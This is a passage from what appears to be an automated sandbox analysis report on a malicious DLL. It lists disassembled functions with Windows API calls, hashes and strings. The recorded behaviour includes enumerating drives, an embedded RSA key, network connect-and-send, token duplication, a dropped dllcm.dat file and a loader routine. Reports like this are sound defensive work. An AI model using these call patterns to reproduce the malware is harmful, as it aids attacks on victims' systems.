                                                  • Part of subcall function 02E56916: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,02E591A4,000000FF,00000000,00000000,?,02E591A4,00000000), ref: 02E56961
                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,00000000), ref: 02E58E53
                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 02E58E5A
                                                • LocalFree.KERNEL32(?), ref: 02E58E70
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$ByteCharFreeMultiProcessWidehtonl$AllocLocalinet_ntoa
                                                • String ID:
                                                • API String ID: 3470587009-0
                                                • Opcode ID: 096c5efb8054e96b62438231dd04875471e04ae5cd3ca373f0fe55c33ac26e75
                                                • Instruction ID: 98dad1f1cc5af1652272f870e593dae801f44249c7a608410fb987c159ae6d79
                                                • Opcode Fuzzy Hash: 096c5efb8054e96b62438231dd04875471e04ae5cd3ca373f0fe55c33ac26e75
                                                • Instruction Fuzzy Hash: 4E0112B5990724AFCB04AFB6DDC885F7BBCEF483547509855F946E3101DB74A9808B70
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E51EEF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58memorythreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLogicalDrives.KERNELBASE ref: 02E51EF7
                                                • GetDriveTypeW.KERNELBASE(?,?,?,?,02E5808B), ref: 02E51F2E
                                                • LocalAlloc.KERNEL32(00000040,00000020,?,?,?,02E5808B), ref: 02E51F3D
                                                • CreateThread.KERNELBASE(00000000,00000000,02E51E51,00000000,00000000,00000000), ref: 02E51F66
                                                Strings
                                                • MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+Y, xrefs: 02E51F4A
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocCreateDriveDrivesLocalLogicalThreadType
                                                • String ID: MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+Y
                                                • API String ID: 2320387513-881851080
                                                • Opcode ID: 0fb27049705a99194a8b7f3c718502c61dec90e86b1a7ba5a327fdd0dc847dfb
                                                • Instruction ID: 140b6e43e8880342b5167ce4303336029e3f8fb2240df55bf229ed49b1f9bf29
                                                • Opcode Fuzzy Hash: 0fb27049705a99194a8b7f3c718502c61dec90e86b1a7ba5a327fdd0dc847dfb
                                                • Instruction Fuzzy Hash: FA0104356A0324BFD704DBA6DC09FAF7BB8EF48764F00485AE609DB181D7709980C760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E57C10 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51sleepthreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetComputerNameExW.KERNEL32(00000004,?,?,02CD6160,02CD6160), ref: 02E57C4F
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00008E7F,02CD6160,00000000,00000000), ref: 02E57C71
                                                • Sleep.KERNEL32(0002BF20,02CD6160,02CD6160), ref: 02E57C9D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ComputerCreateNameSleepThread
                                                • String ID: 127.0.0.1$localhost
                                                • API String ID: 2701298213-2339935011
                                                • Opcode ID: f1b56eb7e83e9360eee39651fc19ffd5299c60c79f12f9f83239825908a9d277
                                                • Instruction ID: db56ae155d54b543ab68ed808745ce88bac3cc19039a62fef1e11bd29dfec4a2
                                                • Opcode Fuzzy Hash: f1b56eb7e83e9360eee39651fc19ffd5299c60c79f12f9f83239825908a9d277
                                                • Instruction Fuzzy Hash: 6C01A7B18D4238BAE220B7779C8CEBBBA7CDB45B44F50A114BE05E2040DA605C64C9B1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E59F8E Relevance: 7.6, APIs: 5, Instructions: 88threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentThread.KERNEL32 ref: 02E59FA7
                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02E5A125,00000000), ref: 02E59FAE
                                                • DuplicateTokenEx.ADVAPI32(00000000,02000000,00000000,00000002,00000002,02E5A125), ref: 02E59FC9
                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5A05B
                                                • CloseHandle.KERNEL32(02E5A125,?,00000000,00000000,00000000,00000024,02E56EDA,00000000,0000FFFF), ref: 02E5A068
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandleThreadToken$CurrentDuplicateOpen
                                                • String ID:
                                                • API String ID: 3602278934-0
                                                • Opcode ID: df8c3043d25d9d06f163ab310662e16ccb35e5e7dc863185c1be5cbd5924aa29
                                                • Instruction ID: c06a835a177bb4ec0004367705756e2c4929c640928d714a54bfdfdb8a8cf5aa
                                                • Opcode Fuzzy Hash: df8c3043d25d9d06f163ab310662e16ccb35e5e7dc863185c1be5cbd5924aa29
                                                • Instruction Fuzzy Hash: 64216271DA0228BADB20ABB69C45EDFB7BDAF84704F50D425F901B2140DB309A41DB70
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E5122D Relevance: 7.6, APIs: 5, Instructions: 59fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileA.KERNELBASE(?,80100000,00000003,00000000,00000003,00000000,00000000,00000000,00000000), ref: 02E5125B
                                                • GetLastError.KERNEL32 ref: 02E51268
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateErrorFileLast
                                                • String ID:
                                                • API String ID: 1214770103-0
                                                • Opcode ID: 8e3a9c2eda776309afaf2857b05f993c07ae529200851d2a0fe9a546918d6985
                                                • Instruction ID: 5f83ddb58bcaba82a86fccf633bcff8ef2f4b3139019b55f49dcdecd77e5d832
                                                • Opcode Fuzzy Hash: 8e3a9c2eda776309afaf2857b05f993c07ae529200851d2a0fe9a546918d6985
                                                • Instruction Fuzzy Hash: 111186359E0235BBD7215A65DC04BAA7A6CEF467A4F108524FD0DDA180D7348A54DBE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E56727 Relevance: 7.6, APIs: 5, Instructions: 56networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • socket.WS2_32(00000002,00000001,00000006), ref: 02E56737
                                                • ioctlsocket.WS2_32(00000000,8004667E,000001BD), ref: 02E5674C
                                                • htons.WS2_32(00058778), ref: 02E56784
                                                • inet_addr.WS2_32(02CE5020), ref: 02E56791
                                                • connect.WS2_32(00000000,?,?), ref: 02E567A1
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: connecthtonsinet_addrioctlsocketsocket
                                                • String ID:
                                                • API String ID: 2155135532-0
                                                • Opcode ID: eb198959b93a0577a4b27f1d350834f0c90abd134bd8b2a4fcf8e04664fa3c2d
                                                • Instruction ID: ff68d1cf3d5b40d671a1e4b2d95c81ffae26a013ad31e86c58a59d45058fe7f2
                                                • Opcode Fuzzy Hash: eb198959b93a0577a4b27f1d350834f0c90abd134bd8b2a4fcf8e04664fa3c2d
                                                • Instruction Fuzzy Hash: F0110E3A890228BFEB109FB5CC09AEFBF39EF45320F400656FA1196190C33085A1C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E596C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                Download Yara Rule
                                                APIs
                                                • PathFindFileNameW.SHLWAPI(C:\Windows\dllcm.dat,00000000,00000000), ref: 02E596F4
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 02E59735
                                                • inet_addr.WS2_32(?), ref: 02E59742
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharFileFindMultiNamePathWideinet_addr
                                                • String ID: C:\Windows\dllcm.dat
                                                • API String ID: 2501698972-1561905061
                                                • Opcode ID: 66702ffce0155f49d1e206db5c50b7b3b2fe498f7d3961c1efd12f1f3130e957
                                                • Instruction ID: 17bd5b98fa5470bd71b2709a6cb044b81c01ccc1a4809926247838d9a2082d9d
                                                • Opcode Fuzzy Hash: 66702ffce0155f49d1e206db5c50b7b3b2fe498f7d3961c1efd12f1f3130e957
                                                • Instruction Fuzzy Hash: 0A21DE35980229EBDF209F65DC09FDA77BCEB44368F048992F905D6081E7B0A684CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E59367 Relevance: 6.1, APIs: 4, Instructions: 109memorylibraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,00000004,?), ref: 02E593E1
                                                • LoadLibraryA.KERNELBASE(?), ref: 02E5940B
                                                • GetProcAddress.KERNELBASE(00000000,02E50000), ref: 02E5944E
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 02E5948E
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                • String ID:
                                                • API String ID: 3300690313-0
                                                • Opcode ID: 6cb8027783ac9c47a34d24090d252a5554393f4ccdb78b8c07b3ab78f2574138
                                                • Instruction ID: e4ee17d172b96c9c69af29dbdc7d3733a3a0a7509759755aa13c32821f4b601a
                                                • Opcode Fuzzy Hash: 6cb8027783ac9c47a34d24090d252a5554393f4ccdb78b8c07b3ab78f2574138
                                                • Instruction Fuzzy Hash: DC413C71990229DFCF10CF99D884BAEB7F9FF04359F1494A9D805A7242D370E990CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E5A073 Relevance: 5.1, APIs: 4, Instructions: 61memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02E5A0E2
                                                • HeapFree.KERNEL32(00000000), ref: 02E5A0EB
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02E5A0F0
                                                • HeapFree.KERNEL32(00000000), ref: 02E5A0F3
                                                  • Part of subcall function 02E59E05: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000003,00000003,?,00000000,?,?), ref: 02E59E8A
                                                  • Part of subcall function 02E59E05: HeapFree.KERNEL32(00000000), ref: 02E59E91
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$FreeProcess
                                                • String ID:
                                                • API String ID: 3859560861-0
                                                • Opcode ID: d2f2420698127494b76ddc91e68902af500d45e19221b1792bd45c599edede3d
                                                • Instruction ID: 8459266d12d62900fa6e0ff05ec8d26d063cb173d052a410e36623ceb04d4215
                                                • Opcode Fuzzy Hash: d2f2420698127494b76ddc91e68902af500d45e19221b1792bd45c599edede3d
                                                • Instruction Fuzzy Hash: 20018475AB0234ABDB10AA76DD44F6B76EDAF48298F049425FE05D7240DB70E9418AF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E5688F Relevance: 4.5, APIs: 3, Instructions: 48networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 02E568AE
                                                • select.WS2_32(00000000,00000000,?,00000000,000001BD), ref: 02E568E4
                                                • send.WS2_32(?,000001BD,02CE5020,00000000), ref: 02E568FC
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: memsetselectsend
                                                • String ID:
                                                • API String ID: 1046435934-0
                                                • Opcode ID: 644ebce27dcdbf3baaebb46d82a38c4ab2893fe8b3bfd34544237b46e8663b74
                                                • Instruction ID: 5361238f38f2e507f7b5d9d094fd38a1ef9411963c54c55e05a7425d181138c3
                                                • Opcode Fuzzy Hash: 644ebce27dcdbf3baaebb46d82a38c4ab2893fe8b3bfd34544237b46e8663b74
                                                • Instruction Fuzzy Hash: 0301B171851128BBDB208FA4CC48ADFBBBCEF05324F508266B819E5080D7B086E8CFD0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E58946 Relevance: 4.5, APIs: 3, Instructions: 39fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000001,00000000,00000000,74DEDF60,74DEF380,?,02E58A84,02D95060,?,00000000), ref: 02E58963
                                                • WriteFile.KERNELBASE(00000000,02D95060,?,02E58A84,00000000,?,02E58A84,02D95060,?,00000000), ref: 02E5897A
                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,02E58A84,02D95060,?,00000000), ref: 02E5898B
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$ChangeCloseCreateFindNotificationWrite
                                                • String ID:
                                                • API String ID: 3805958096-0
                                                • Opcode ID: 2175b1db143e9a4d6cbc123688035274516e8ce7f585360e57e32934186e60d4
                                                • Instruction ID: 9299dc1f19cbad1e17a948154c822ab7635692ec3e94034e96cfcd958034816b
                                                • Opcode Fuzzy Hash: 2175b1db143e9a4d6cbc123688035274516e8ce7f585360e57e32934186e60d4
                                                • Instruction Fuzzy Hash: ADF0E232280239FB9B205E669C0CEFB7E6CFF466B5B044529FD19C1040D73088A1CAF2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E573AE Relevance: 4.5, APIs: 3, Instructions: 36fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000,?,00000000,?,02E57641,?,?,?,74DF0F10), ref: 02E573C4
                                                • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,02E57641,?,?,?,74DF0F10,?,02E57EB2), ref: 02E573DE
                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,02E57641,?,?,?,74DF0F10,?,02E57EB2), ref: 02E573EF
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$ChangeCloseCreateFindNotificationWrite
                                                • String ID:
                                                • API String ID: 3805958096-0
                                                • Opcode ID: b5191b5450ae4f7bc6e0d3c624f05c0bed5606932872945473406415cb59d328
                                                • Instruction ID: e5d813b8aa419fcf2a814917c970d4891b3445c540cc0ce2a66eb4b96bc9342c
                                                • Opcode Fuzzy Hash: b5191b5450ae4f7bc6e0d3c624f05c0bed5606932872945473406415cb59d328
                                                • Instruction Fuzzy Hash: 59F03A311801347BDA205A26DC8CEEBBE2CEB466F4F108011FD09C6190D7308961C6F0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E5835E Relevance: 4.5, APIs: 3, Instructions: 34fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 02E58320: PathFindFileNameW.SHLWAPI(C:\Windows\dllcm.dat,00000000,?,02E57DC9,?), ref: 02E5832B
                                                  • Part of subcall function 02E58320: PathCombineW.SHLWAPI(02E57DC9,C:\Windows\,00000000,?,02E57DC9,?), ref: 02E5833A
                                                  • Part of subcall function 02E58320: PathFindExtensionW.SHLWAPI(02E57DC9,?,02E57DC9,?), ref: 02E58347
                                                • PathFileExistsW.KERNELBASE(?,?), ref: 02E58381
                                                • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,04000000,00000000), ref: 02E583A1
                                                • ExitProcess.KERNEL32(00000000), ref: 02E583B6
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Path$File$Find$CombineCreateExistsExitExtensionNameProcess
                                                • String ID:
                                                • API String ID: 1261333597-0
                                                • Opcode ID: b79d3417471ed288c2a41689ae0478dc695c033c5079028f31bfc0f22444b0d7
                                                • Instruction ID: 1424c706afa778093f5ef17c473f6c0df11827d7f9aaa2d6a5e8cc594e036f5d
                                                • Opcode Fuzzy Hash: b79d3417471ed288c2a41689ae0478dc695c033c5079028f31bfc0f22444b0d7
                                                • Instruction Fuzzy Hash: 7EF0A7729912386BC624E671AC49FCB765D8F44655F440561BA05E3080EF20D9E58AE4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E5A274 Relevance: 3.8, APIs: 3, Instructions: 46memorysleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(?), ref: 02E5A282
                                                • GetProcessHeap.KERNEL32(00000000,?,?), ref: 02E5A2D2
                                                • HeapFree.KERNEL32(00000000), ref: 02E5A2D9
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$FreeProcessSleep
                                                • String ID:
                                                • API String ID: 1803097132-0
                                                • Opcode ID: 8b6d9f99bb62f8b39890f6735f993513e961824b8bf700e0fcf696df01fc5bc0
                                                • Instruction ID: 9021048b008fb881095400f2cee099445ca7fdb98c2d2e8b0ad7b53713f39dc2
                                                • Opcode Fuzzy Hash: 8b6d9f99bb62f8b39890f6735f993513e961824b8bf700e0fcf696df01fc5bc0
                                                • Instruction Fuzzy Hash: D3016D769A02386BDF10ABF69C44EDF77ADEF58244B445535FE05E2140EB24E4508BB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E5C27F Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 308COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: malloc
                                                • String ID: @
                                                • API String ID: 2803490479-2766056989
                                                • Opcode ID: 5a8ed52218412ee9b2d07de46c5a312a5ffec01428d6fdd34498493a84d842c6
                                                • Instruction ID: 038e9615d11d481ee43045ce8b0d35455834ae21405c89c88dc874babac12357
                                                • Opcode Fuzzy Hash: 5a8ed52218412ee9b2d07de46c5a312a5ffec01428d6fdd34498493a84d842c6
